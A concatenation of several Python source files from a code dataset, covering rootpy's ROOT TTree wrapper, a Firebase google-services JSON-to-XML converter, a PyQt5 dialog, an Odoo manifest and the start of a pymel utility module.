self.SetBranchStatus(b, 0)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 0)
@property
def branches(self):
"""
List of the branches
"""
return [branch for branch in self.GetListOfBranches()]
def iterbranches(self):
"""
Iterator over the branches
"""
for branch in self.GetListOfBranches():
yield branch
@property
def branchnames(self):
"""
List of branch names
"""
return [branch.GetName() for branch in self.GetListOfBranches()]
def iterbranchnames(self):
"""
Iterator over the branch names
"""
for branch in self.iterbranches():
yield branch.GetName()
def glob(self, patterns, exclude=None):
"""
Return a list of branch names that match ``pattern``.
Exclude all matched branch names which also match a pattern in
``exclude``. ``exclude`` may be a string or list of strings.
Parameters
----------
patterns: str or list
branches are matched against this pattern or list of patterns where
globbing is performed with '*'.
exclude : str or list, optional (default=None)
branches matching this pattern or list of patterns are excluded
even if they match a pattern in ``patterns``.
Returns
-------
matches : list
List of matching branch names
"""
if isinstance(patterns, basestring):
patterns = [patterns]
if isinstance(exclude, basestring):
exclude = [exclude]
matches = []
for pattern in patterns:
matches += fnmatch.filter(self.iterbranchnames(), pattern)
if exclude is not None:
for exclude_pattern in exclude:
matches = [match for match in matches
if not fnmatch.fnmatch(match, exclude_pattern)]
return matches
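    # Quick illustrative example of branch-name globbing (the branch names
    # below are hypothetical):
    #
    #     >>> tree.glob('el_*', exclude='el_*_truth')
    #     ['el_pt', 'el_eta']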
def __getitem__(self, item):
"""
Get an entry in the tree or a branch
Parameters
----------
item : str or int
if item is a str then return the value of the branch with that name
if item is an int then call GetEntry
"""
if isinstance(item, basestring):
return self._buffer[item]
self.GetEntry(item)
return self
def GetEntry(self, entry):
"""
Get an entry. Tree collections are reset
(see ``rootpy.tree.treeobject``)
Parameters
----------
entry : int
entry index
Returns
-------
ROOT.TTree.GetEntry : int
The number of bytes read
"""
if not (0 <= entry < self.GetEntries()):
raise IndexError("entry index out of range: {0:d}".format(entry))
self._buffer.reset_collections()
return super(BaseTree, self).GetEntry(entry)
def __iter__(self):
"""
Iterator over the entries in the Tree.
"""
if not self._buffer:
self.create_buffer()
if self.read_branches_on_demand:
self._buffer.set_tree(self)
# drop all branches from the cache
self.DropBranchFromCache('*')
for attr in self._always_read:
try:
branch = self._branch_cache[attr]
except KeyError: # one-time hit
branch = self.GetBranch(attr)
if not branch:
raise AttributeError(
"branch `{0}` specified in "
"`always_read` does not exist".format(attr))
self._branch_cache[attr] = branch
# add branches that we should always read to cache
self.AddBranchToCache(branch)
for i in xrange(self.GetEntries()):
# Only increment current entry.
# getattr on a branch will then GetEntry on only that branch
# see ``TreeBuffer.get_with_read_if_cached``.
self._current_entry = i
self.LoadTree(i)
for attr in self._always_read:
# Always read branched in ``self._always_read`` since
# these branches may never be getattr'd but the TreeBuffer
# should always be updated to reflect their current values.
# This is useful if you are iterating over an input tree
# and writing to an output tree that shares the same
# TreeBuffer but you don't getattr on all branches of the
# input tree in the logic that determines which entries
# to keep.
self._branch_cache[attr].GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.next_entry()
self._buffer.reset_collections()
else:
for i in xrange(self.GetEntries()):
# Read all activated branches (can be slow!).
super(BaseTree, self).GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.reset_collections()
def __setattr__(self, attr, value):
if '_inited' not in self.__dict__ or attr in self.__dict__:
return super(BaseTree, self).__setattr__(attr, value)
try:
return self._buffer.__setattr__(attr, value)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __getattr__(self, attr):
if '_inited' not in self.__dict__:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
try:
return getattr(self._buffer, attr)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __setitem__(self, item, value):
self._buffer[item] = value
def __len__(self):
"""
Same as GetEntries
"""
return self.GetEntries()
def __contains__(self, branch):
"""
Same as has_branch
"""
return self.has_branch(branch)
def has_branch(self, branch):
"""
Determine if this Tree contains a branch with the name ``branch``
Parameters
----------
branch : str
branch name
Returns
-------
has_branch : bool
True if this Tree contains a branch with the name ``branch`` or
False otherwise.
"""
return not not self.GetBranch(branch)
def csv(self, sep=',', branches=None,
include_labels=True, limit=None,
stream=None):
"""
        Print a csv representation of the tree, only including branches
        of basic types (no objects, vectors, etc.)
Parameters
----------
sep : str, optional (default=',')
The delimiter used to separate columns
branches : list, optional (default=None)
Only include these branches in the CSV output. If None, then all
basic types will be included.
include_labels : bool, optional (default=True)
Include a first row of branch names labelling each column.
limit : int, optional (default=None)
Only include up to a maximum of ``limit`` rows in the CSV.
stream : file, (default=None)
Stream to write the CSV output on. By default the CSV will be
written to ``sys.stdout``.
"""
if stream is None:
stream = sys.stdout
if not self._buffer:
self.create_buffer(ignore_unsupported=True)
if branches is None:
branchdict = OrderedDict([
(name, self._buffer[name])
for name in self.iterbranchnames()
if isinstance(self._buffer[name], (Scalar, Array))])
else:
branchdict = OrderedDict()
for name in branches:
if not isinstance(self._buffer[name], (Scalar, Array)):
raise TypeError(
"selected branch `{0}` "
"is not a scalar or array type".format(name))
branchdict[name] = self._buffer[name]
if not branchdict:
raise RuntimeError(
"no branches selected or no "
"branches of scalar or array types exist")
if include_labels:
# expand array types to f[0],f[1],f[2],...
print >> stream, sep.join(
name if isinstance(value, (Scalar, BaseChar))
else sep.join('{0}[{1:d}]'.format(name, idx)
for idx in xrange(len(value)))
for name, value in branchdict.items())
# even though 'entry' is not used, enumerate or simply iterating over
# self is required to update the buffer with the new branch values at
# each tree entry.
for i, entry in enumerate(self):
print >> stream, sep.join(
str(v.value) if isinstance(v, (Scalar, BaseChar))
else sep.join(map(str, v))
for v in branchdict.values())
if limit is not None and i + 1 == limit:
break
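    # Example sketch: write the first ten rows of the scalar branches to a
    # file (the output path is an arbitrary choice):
    #
    #     >>> with open('tree.csv', 'w') as out:
    #     ...     tree.csv(limit=10, stream=out)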
def Scale(self, value):
"""
Scale the weight of the Tree by ``value``
Parameters
----------
value : int, float
Scale the Tree weight by this value
"""
self.SetWeight(self.GetWeight() * value)
def GetEntries(self, cut=None, weighted_cut=None, weighted=False):
"""
Get the number of (weighted) entries in the Tree
Parameters
----------
cut : str or rootpy.tree.cut.Cut, optional (default=None)
Only entries passing this cut will be included in the count
weighted_cut : str or rootpy.tree.cut.Cut, optional (default=None)
Apply a weighted selection and determine the weighted number of
entries.
weighted : bool, optional (default=False)
Multiply the number of (weighted) entries by the Tree weight.
"""
if weighted_cut:
hist = Hist(1, -1, 2)
branch = self.GetListOfBranches()[0].GetName()
weight = self.GetWeight()
self.SetWeight(1)
self.Draw('{0}=={1}>>{2}'.format(branch, branch, hist.GetName()),
weighted_cut * cut)
self.SetWeight(weight)
entries = hist.Integral()
elif cut:
entries = super(BaseTree, self).GetEntries(str(cut))
else:
entries = super(BaseTree, self).GetEntries()
if weighted:
entries *= self.GetWeight()
return entries
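    # Illustrative usage (the cut expression is a made-up example):
    #
    #     >>> tree.GetEntries('pt > 20')                     # count passing the cut
    #     >>> tree.GetEntries(cut='pt > 20', weighted=True)  # scaled by the tree weight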
def GetMaximum(self, expression, cut=None):
"""
TODO: we need a better way of determining the maximum value of an
expression.
"""
if cut:
self.Draw(expression, cut, 'goff')
else:
self.Draw(expression, '', 'goff')
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return max(vals)
def GetMinimum(self, expression, cut=None):
"""
TODO: we need a better way of determining the minimum value of an
expression.
"""
if cut:
self.Draw(expression, cut, "goff")
else:
self.Draw(expression, "", "goff")
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return min(vals)
def CopyTree(self, selection, *args, **kwargs):
"""
Copy the tree while supporting a rootpy.tree.cut.Cut selection in
addition to a simple string.
"""
return super(BaseTree, self).CopyTree(str(selection), *args, **kwargs)
def reset_branch_values(self):
"""
Reset all values in the buffer to their default values
"""
self._buffer.reset()
@method_file_cd
def Write(self, *args, **kwargs):
super(BaseTree, self).Write(*args, **kwargs)
def Draw(self,
expression,
selection="",
options="",
hist=None,
create_hist=False,
**kwargs):
"""
Draw a TTree with a selection as usual, but return the created
histogram.
Parameters
----------
expression : str
The expression to draw. Multidimensional expressions are separated
by ":". rootpy reverses the expressions along each dimension so the
order matches the order of the elements identifying a location in
the resulting histogram. By default ROOT takes the expression "Y:X"
to mean Y versus X but we argue that this is counterintuitive and
that the order should be "X:Y" so that the expression along the
first dimension identifies the location along the first axis, etc.
selection : str or rootpy.tree.Cut, optional (default="")
The cut expression. Only entries satisfying this selection are
included in the filled histogram.
options : str, optional (default="")
Draw options passed to ROOT.TTree.Draw
hist : ROOT.TH1, optional (default=None)
The histogram to be filled. If not specified, rootpy will attempt
to find what ROOT created and return that.
create_hist : bool (default=False)
            If True and ``hist`` is not specified and a histogram name is not
specified in the draw expression, then override ROOT's
default behaviour and fill a new histogram. ROOT will otherwise add
points to a TGraph or TPolyMarker3D if not drawing in more than
two dimensions.
kwargs : dict, optional
Remaining keword arguments are used to set the style attributes of
the histogram.
Returns
-------
If ``hist`` is specified, None is returned. If ``hist`` is left
unspecified, an attempt is made to retrieve the generated histogram
which is then returned.
"""
# Check that we have a valid draw expression and pick out components
exprmatch = re.match(BaseTree.DRAW_PATTERN, expression)
if not exprmatch:
raise ValueError(
"not a valid draw expression: `{0}`".format(expression))
# Reverse variable order to match order in hist constructor
exprdict = exprmatch.groupdict()
fields = exprdict['branches'].split(':')
num_dimensions = len(fields)
expression = ':'.join(fields[:3][::-1] + fields[3:])
if exprdict['redirect'] is not None:
expression += exprdict['redirect']
if not isinstance(selection, Cut):
# Let Cut handle any extra processing (i.e. ternary operators)
selection = Cut(selection)
graphics = 'goff' not in options
if hist is not None:
if not isinstance(hist, ROOT.TH1):
raise TypeError("Cannot draw into a `{0}`".format(type(hist)))
# Check that the dimensionality of the expression and object match
if num_dimensions != hist.GetDimension():
raise TypeError(
"The dimensionality of the expression `{0}` ({1:d}) "
"does not match the dimensionality of a `{2}`".format(
expression, num_dimensions, hist.__class__.__name__))
# Handle graphics ourselves
if graphics:
if options:
options += ' '
options += 'goff'
if exprdict['name'] is None:
# Draw into histogram supplied by user
expression = '{0}>>+{1}'.format(expression, hist.GetName())
else:
if exprdict['name'] != hist.GetName():
# If the user specified a name to draw into then check that
# this is consistent with the specified object.
raise ValueError(
"The name specified in the draw "
"expression `{0}` does not match the "
"name of the specified object `{1}`".format(
exprdict['name'],
hist.GetName()))
# Check that binning is not specified
if exprdict['binning'] is not None:
raise ValueError(
"When specifying the object to draw into, do not "
"specify a binning in the draw expression")
else:
if create_hist and exprdict['name'] is None:
if num_dimensions > 4:
raise ValueError(
"Cannot create a histogram for expressions with "
"more than 4 dimensions")
newname = uuid.uuid4().hex
expression += '>>{0}'.format(newname)
exprdict['name'] = newname
pad = ROOT.gPad.func()
own_pad = False
if graphics and not pad:
# Create a new canvas if one doesn't exist yet
own_pad = True
pad = Canvas()
# Note: TTree.Draw() pollutes gDirectory, make a temporary one
with thread_specific_tmprootdir():
if hist is not None:
# If a custom histogram is specified (i.e, it's not being
# created root side), then temporarily put it into the
# temporary thread-specific directory.
context = set_directory(hist)
else:
context = do_nothing()
with context:
super(BaseTree, self).Draw(expression, selection, options)
if hist is None:
# Retrieve histogram made by TTree.Draw
if num_dimensions == 1 or exprdict['name'] is not None:
# a TH1
hist = asrootpy(self.GetHistogram(), warn=False)
elif num_dimensions == 2:
# a TGraph
hist = asrootpy(pad.GetPrimitive('Graph'), warn=False)
else:
# ROOT: For a three and four dimensional Draw the TPolyMarker3D
# is unnamed, and cannot be retrieved. Why, ROOT?
log.warning(
"Cannot retrieve the TPolyMarker3D for "
"3D and 4D expressions")
if graphics and own_pad:
# Since we cannot access the TPolyMarker3D we use self to
# keep the canvas alive
keepalive(self, pad)
if hist: # is not None
if isinstance(hist, Plottable):
hist.decorate(**kwargs)
# ROOT, don't try to delete this object! (See issue #277)
hist.SetBit(ROOT.kCanDelete, False)
if graphics:
if own_pad:
# The usual bug is that the histogram is garbage
# collected and we want the canvas to keep the
# histogram alive, but here the canvas has been
# created locally and we are returning the histogram,
# so we want the histogram to keep the canvas alive.
keepalive(hist, pad)
# Redraw the histogram since we may have specified style
# attributes in **kwargs
hist.Draw()
if graphics:
pad.Modified()
pad.Update()
return hist
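    # Short hedged example of filling a user-supplied histogram as described
    # in the docstring above; the branch names, cut and binning are
    # illustrative only:
    #
    #     >>> h = Hist(100, 0, 5)
    #     >>> tree.Draw('x', selection='y > 0', hist=h, linecolor='red')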
def to_array(self, *args, **kwargs):
"""
Convert this tree into a NumPy structured array
"""
from root_numpy import tree2array
return tree2array(self, *args, **kwargs)
@snake_case_methods
class Tree(BaseTree, QROOT.TTree):
"""
Inherits from TTree so all regular TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
name : str, optional (default=None)
The Tree name (a UUID if None)
title : str, optional (default=None)
The Tree title (empty string if None)
model : TreeModel, optional (default=None)
If specified then this TreeModel will be used to create the branches
"""
_ROOT = QROOT.TTree
@method_file_check
def __init__(self, name=None, title=None, model=None):
super(Tree, self).__init__(name=name, title=title)
self._buffer = TreeBuffer()
if model is not None:
if not issubclass(model, TreeModel):
raise TypeError("the model must subclass TreeModel")
self.set_buffer(model(), create_branches=True)
self._post_init()
def Fill(self, reset=False):
"""
Fill the Tree with the current values in the buffer
Parameters
----------
reset : bool, optional (default=False)
Reset the values in the buffer to their default values after
filling.
"""
super(Tree, self).Fill()
# reset all branches
if reset:
self._buffer.reset()
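# Minimal end-to-end sketch of writing a Tree from a TreeModel (illustrative
# only: the file name and model fields are made up, and FloatCol/IntCol are
# assumed to be the usual rootpy column types importable from rootpy.tree):
#
#     >>> from rootpy.io import root_open
#     >>> from rootpy.tree import TreeModel, FloatCol, IntCol
#     >>> class Event(TreeModel):
#     ...     x = FloatCol()
#     ...     n = IntCol()
#     >>> with root_open('example.root', 'recreate'):
#     ...     tree = Tree('events', model=Event)
#     ...     for i in range(100):
#     ...         tree.x = i * 0.1
#     ...         tree.n = i
#     ...         tree.Fill(reset=True)
#     ...     tree.Write()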
@snake_case_methods
class Ntuple(BaseTree, QROOT.TNtuple):
"""
Inherits from TNtuple so all regular TNtuple/TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
varlist : list of str
A list of the field names
name : str, optional (default=None)
The Ntuple name (a UUID if None)
title : str, optional (default=None)
The Ntuple title (empty string if None)
bufsize : int, optional (default=32000)
Basket buffer size
"""
_ROOT = QROOT.TNtuple
@method_file_check
def __init__(self, varlist, name=None, title=None, bufsize=32000):
super(Ntuple, self).__init__(':'.join(varlist), bufsize,
name=name,
title=title)
self._post_init()
| gpl-3.0 | -4,759,378,811,842,880,000 | 36.006623 | 79 | 0.547691 | false |
Jason-Zhao-Jie/MagicTower | Assets/Firebase/Editor/generate_xml_from_google_services_json.py | 1 | 13865 | #!/usr/bin/python
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stand-alone implementation of the Gradle Firebase plugin.
Converts the services json file to xml:
https://googleplex-android.googlesource.com/platform/tools/base/+/studio-master-dev/build-system/google-services/src/main/groovy/com/google/gms/googleservices
"""
__author__ = 'Wouter van Oortmerssen'
import argparse
import json
import os
import sys
from xml.etree import ElementTree
# Input filename if it isn't set.
DEFAULT_INPUT_FILENAME = 'app/google-services.json'
# Output filename if it isn't set.
DEFAULT_OUTPUT_FILENAME = 'res/values/googleservices.xml'
# Input filename for .plist files, if it isn't set.
DEFAULT_PLIST_INPUT_FILENAME = 'GoogleService-Info.plist'
# Output filename for .json files, if it isn't set.
DEFAULT_JSON_OUTPUT_FILENAME = 'google-services-desktop.json'
# Indicates a web client in the oauth_client list.
OAUTH_CLIENT_TYPE_WEB = 3
def read_xml_value(xml_node):
"""Utility method for reading values from the plist XML.
Args:
xml_node: An ElementTree node, that contains a value.
Returns:
The value of the node, or None, if it could not be read.
"""
if xml_node.tag == 'string':
return xml_node.text
elif xml_node.tag == 'integer':
return int(xml_node.text)
elif xml_node.tag == 'real':
return float(xml_node.text)
elif xml_node.tag == 'false':
return 0
elif xml_node.tag == 'true':
return 1
else:
# other types of input are ignored. (data, dates, arrays, etc.)
return None
def construct_plist_dictionary(xml_root):
"""Constructs a dictionary of values based on the contents of a plist file.
Args:
xml_root: An ElementTree node, that represents the root of the xml file
that is to be parsed. (Which should be a dictionary containing
key-value pairs of the properties that need to be extracted.)
Returns:
A dictionary, containing key-value pairs for all (supported) entries in the
node.
"""
xml_dict = xml_root.find('dict')
if xml_dict is None:
return None
plist_dict = {}
i = 0
while i < len(xml_dict):
if xml_dict[i].tag == 'key':
key = xml_dict[i].text
i += 1
if i < len(xml_dict):
value = read_xml_value(xml_dict[i])
if value is not None:
plist_dict[key] = value
i += 1
return plist_dict
def construct_google_services_json(xml_dict):
"""Constructs a google services json file from a dictionary.
Args:
xml_dict: A dictionary of all the key/value pairs that are needed for the
output json file.
Returns:
A string representing the output json file.
"""
try:
json_struct = {
'project_info': {
'project_number': xml_dict['GCM_SENDER_ID'],
'firebase_url': xml_dict['DATABASE_URL'],
'project_id': xml_dict['PROJECT_ID'],
'storage_bucket': xml_dict['STORAGE_BUCKET']
},
'client': [{
'client_info': {
'mobilesdk_app_id': xml_dict['GOOGLE_APP_ID'],
'android_client_info': {
'package_name': xml_dict['BUNDLE_ID']
}
},
'oauth_client': [{
'client_id': xml_dict['CLIENT_ID'],
}],
'api_key': [{
'current_key': xml_dict['API_KEY']
}],
'services': {
'analytics_service': {
'status': xml_dict['IS_ANALYTICS_ENABLED']
},
'appinvite_service': {
'status': xml_dict['IS_APPINVITE_ENABLED']
}
}
},],
'configuration_version':
'1'
}
return json.dumps(json_struct, indent=2)
except KeyError as e:
sys.stderr.write('Could not find key in plist file: [%s]\n' % (e.args[0]))
return None
def convert_plist_to_json(plist_string, input_filename):
"""Converts an input plist string into a .json file and saves it.
Args:
plist_string: The contents of the loaded plist file.
input_filename: The file name that the plist data was read from.
Returns:
the converted string, or None if there were errors.
"""
try:
root = ElementTree.fromstring(plist_string)
except ElementTree.ParseError:
sys.stderr.write('Error parsing file %s.\n'
'It does not appear to be valid XML.\n' % (input_filename))
return None
plist_dict = construct_plist_dictionary(root)
if plist_dict is None:
sys.stderr.write('In file %s, could not locate a top-level \'dict\' '
'element.\n'
'File format should be plist XML, with a top-level '
'dictionary containing project settings as key-value '
'pairs.\n' % (input_filename))
return None
json_string = construct_google_services_json(plist_dict)
return json_string
def gen_string(parent, name, text):
"""Generate one <string /> element and put into the list of keeps.
Args:
parent: The object that will hold the string.
name: The name to store the string under.
text: The text of the string.
"""
if text:
prev = parent.get('tools:keep', '')
if prev:
prev += ','
parent.set('tools:keep', prev + '@string/' + name)
child = ElementTree.SubElement(parent, 'string', {
'name': name,
'translatable': 'false'
})
child.text = text
def indent(elem, level=0):
"""Recurse through XML tree and add indentation.
Args:
elem: The element to recurse over
level: The current indentation level.
"""
i = '\n' + level*' '
if elem is not None:
if not elem.text or not elem.text.strip():
elem.text = i + ' '
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def main():
parser = argparse.ArgumentParser(
description=((
'Converts a Firebase %s into %s similar to the Gradle plugin, or '
'converts a Firebase %s into a %s suitible for use on desktop apps.' %
(DEFAULT_INPUT_FILENAME, DEFAULT_OUTPUT_FILENAME,
DEFAULT_PLIST_INPUT_FILENAME, DEFAULT_JSON_OUTPUT_FILENAME))))
parser.add_argument('-i', help='Override input file name',
metavar='FILE', required=False)
parser.add_argument('-o', help='Override destination file name',
metavar='FILE', required=False)
parser.add_argument('-p', help=('Package ID to select within the set of '
'packages in the input file. If this is '
'not specified, the first package in the '
'input file is selected.'))
parser.add_argument('-l', help=('List all package IDs referenced by the '
'input file. If this is specified, '
'the output file is not created.'),
action='store_true', default=False, required=False)
parser.add_argument('-f', help=('Print project fields from the input file '
'in the form \'name=value\\n\' for each '
'field. If this is specified, the output '
'is not created.'),
action='store_true', default=False, required=False)
parser.add_argument(
'--plist',
help=(
'Specifies a plist file to convert to a JSON configuration file. '
'If this is enabled, the script will expect a .plist file as input, '
'which it will convert into %s file. The output file is '
'*not* suitable for use with Firebase on Android.' %
(DEFAULT_JSON_OUTPUT_FILENAME)),
action='store_true',
default=False,
required=False)
args = parser.parse_args()
if args.plist:
input_filename = DEFAULT_PLIST_INPUT_FILENAME
output_filename = DEFAULT_JSON_OUTPUT_FILENAME
else:
input_filename = DEFAULT_INPUT_FILENAME
output_filename = DEFAULT_OUTPUT_FILENAME
if args.i:
input_filename = args.i
if args.o:
output_filename = args.o
with open(input_filename, 'r') as ifile:
file_string = ifile.read()
json_string = None
if args.plist:
json_string = convert_plist_to_json(file_string, input_filename)
if json_string is None:
return 1
jsobj = json.loads(json_string)
else:
jsobj = json.loads(file_string)
root = ElementTree.Element('resources')
root.set('xmlns:tools', 'http://schemas.android.com/tools')
project_info = jsobj.get('project_info')
if project_info:
gen_string(root, 'firebase_database_url', project_info.get('firebase_url'))
gen_string(root, 'gcm_defaultSenderId', project_info.get('project_number'))
gen_string(root, 'google_storage_bucket',
project_info.get('storage_bucket'))
gen_string(root, 'project_id', project_info.get('project_id'))
if args.f:
if not project_info:
sys.stderr.write('No project info found in %s.' % input_filename)
return 1
for field, value in project_info.iteritems():
sys.stdout.write('%s=%s\n' % (field, value))
return 0
packages = set()
client_list = jsobj.get('client')
if client_list:
# Search for the user specified package in the file.
selected_package_name = ''
selected_client = client_list[0]
find_package_name = args.p
for client in client_list:
package_name = client.get('client_info', {}).get(
'android_client_info', {}).get('package_name', '')
if not package_name:
package_name = client.get('oauth_client', {}).get(
'android_info', {}).get('package_name', '')
if package_name:
if not selected_package_name:
selected_package_name = package_name
selected_client = client
if package_name == find_package_name:
selected_package_name = package_name
selected_client = client
packages.add(package_name)
if args.p and selected_package_name != find_package_name:
sys.stderr.write('No packages found in %s which match the package '
'name %s\n'
'\n'
'Found the following:\n'
'%s\n' % (input_filename, find_package_name,
'\n'.join(packages)))
return 1
client_api_key = selected_client.get('api_key')
if client_api_key:
client_api_key0 = client_api_key[0]
gen_string(root, 'google_api_key', client_api_key0.get('current_key'))
gen_string(root, 'google_crash_reporting_api_key',
client_api_key0.get('current_key'))
client_info = selected_client.get('client_info')
if client_info:
gen_string(root, 'google_app_id', client_info.get('mobilesdk_app_id'))
oauth_client_list = selected_client.get('oauth_client')
if oauth_client_list:
for oauth_client in oauth_client_list:
client_type = oauth_client.get('client_type')
client_id = oauth_client.get('client_id')
if client_type and client_type == OAUTH_CLIENT_TYPE_WEB and client_id:
gen_string(root, 'default_web_client_id', client_id)
# Only include the first matching OAuth web client ID.
break
services = selected_client.get('services')
if services:
ads_service = services.get('ads_service')
if ads_service:
gen_string(root, 'test_banner_ad_unit_id',
ads_service.get('test_banner_ad_unit_id'))
gen_string(root, 'test_interstitial_ad_unit_id',
ads_service.get('test_interstitial_ad_unit_id'))
analytics_service = services.get('analytics_service')
if analytics_service:
analytics_property = analytics_service.get('analytics_property')
if analytics_property:
gen_string(root, 'ga_trackingId',
analytics_property.get('tracking_id'))
      # enable this once we have an example of this service being present
      # in the json data:
maps_service_enabled = False
if maps_service_enabled:
maps_service = services.get('maps_service')
if maps_service:
maps_api_key = maps_service.get('api_key')
if maps_api_key:
for k in range(0, len(maps_api_key)):
# generates potentially multiple of these keys, which is
# the same behavior as the java plugin.
gen_string(root, 'google_maps_key',
maps_api_key[k].get('maps_api_key'))
tree = ElementTree.ElementTree(root)
indent(root)
if args.l:
for package in packages:
if package:
sys.stdout.write(package + '\n')
else:
path = os.path.dirname(output_filename)
if path and not os.path.exists(path):
os.makedirs(path)
if not args.plist:
tree.write(output_filename, 'utf-8', True)
else:
with open(output_filename, 'w') as ofile:
ofile.write(json_string)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 2,530,400,691,713,250,300 | 33.150246 | 158 | 0.60714 | false |
sealcode/gpandoc | ui/recipe_ui.py | 1 | 3014 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'recipe.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(355, 478)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.vertical_layout_1 = QtWidgets.QVBoxLayout()
self.vertical_layout_1.setObjectName("vertical_layout_1")
self.label_1 = QtWidgets.QLabel(Dialog)
self.label_1.setObjectName("label_1")
self.vertical_layout_1.addWidget(self.label_1)
self.combo_box_1 = QtWidgets.QComboBox(Dialog)
self.combo_box_1.setObjectName("combo_box_1")
self.vertical_layout_1.addWidget(self.combo_box_1)
self.verticalLayout.addLayout(self.vertical_layout_1)
self.vertical_layout_2 = QtWidgets.QVBoxLayout()
self.vertical_layout_2.setObjectName("vertical_layout_2")
self.scroll_1 = QtWidgets.QScrollArea(Dialog)
self.scroll_1.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.scroll_1.setWidgetResizable(True)
self.scroll_1.setObjectName("scroll_1")
self.content_1 = QtWidgets.QWidget()
self.content_1.setGeometry(QtCore.QRect(0, 0, 300, 378))
self.content_1.setMaximumSize(QtCore.QSize(300, 600))
self.content_1.setObjectName("content_1")
self.label_2 = QtWidgets.QLabel(self.content_1)
self.label_2.setGeometry(QtCore.QRect(8, 3, 301, 421))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.scroll_1.setWidget(self.content_1)
self.vertical_layout_2.addWidget(self.scroll_1)
self.button_box_1 = QtWidgets.QDialogButtonBox(Dialog)
self.button_box_1.setOrientation(QtCore.Qt.Horizontal)
self.button_box_1.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.button_box_1.setObjectName("button_box_1")
self.vertical_layout_2.addWidget(self.button_box_1)
self.verticalLayout.addLayout(self.vertical_layout_2)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Wybór przepisu"))
self.label_1.setText(_translate("Dialog", "Lista przepisów:"))
self.label_2.setText(_translate("Dialog", "TextLabel"))
| lgpl-3.0 | -7,895,148,468,539,092,000 | 47.580645 | 109 | 0.701527 | false |
Micronaet/micronaet-trip | account_trip_edi_c5/__openerp__.py | 1 | 1740 | ###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Account trip - EDI order import procedure for Company 5',
'version': '0.1',
'category': 'EDI',
'description': """
Import functions for loading EDI files.
This is an importation model for Company 5.
This type of module is linked to edi.company to parametrize
the importation functions.
The import procedure is in account_trip_edi.
""",
'author': 'Micronaet S.r.l. - Nicola Riolini',
'website': 'http://www.micronaet.it',
'license': 'AGPL-3',
'depends': [
'base',
'account_trip_edi',
],
'init_xml': [],
'demo': [],
'data': [
'security/ir.model.access.csv',
'data/edi_company_importation.xml'
],
'active': False,
'installable': True,
'auto_install': False,
}
| agpl-3.0 | -7,736,994,042,556,643,000 | 36.021277 | 79 | 0.577586 | false |
SqueezeStudioAnimation/omtk | python/omtk/libs/libPymel.py | 1 | 14241 | import logging
import pymel.core as pymel
from maya import OpenMaya
#
# A PyNodeChain is a special pymel-related object that act exactly like a standard array.
# However it allow us to have more bells and whistles.
#
def is_valid_PyNode(val):
return (val and hasattr(val, 'exists') and val.exists()) if val else None
def distance_between_nodes(x, y):
"""
Return the distance between two pynodes.
"""
ax, ay, az = x.getTranslation(space="world")
    bx, by, bz = y.getTranslation(space="world")
    return ((ax - bx) ** 2 + (ay - by) ** 2 + (az - bz) ** 2) ** 0.5
def distance_between_vectors(a, b):
"""
http://darkvertex.com/wp/2010/06/05/python-distance-between-2-vectors/
"""
return ((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2) ** 0.5
def is_child_of(node, potential_parent):
while node:
if node == potential_parent:
return True
node = node.getParent()
return False
class PyNodeChain(list):
"""A container for manipulating lists of hosts"""
@property
def start(self):
return next(iter(self), None)
@property
def end(self):
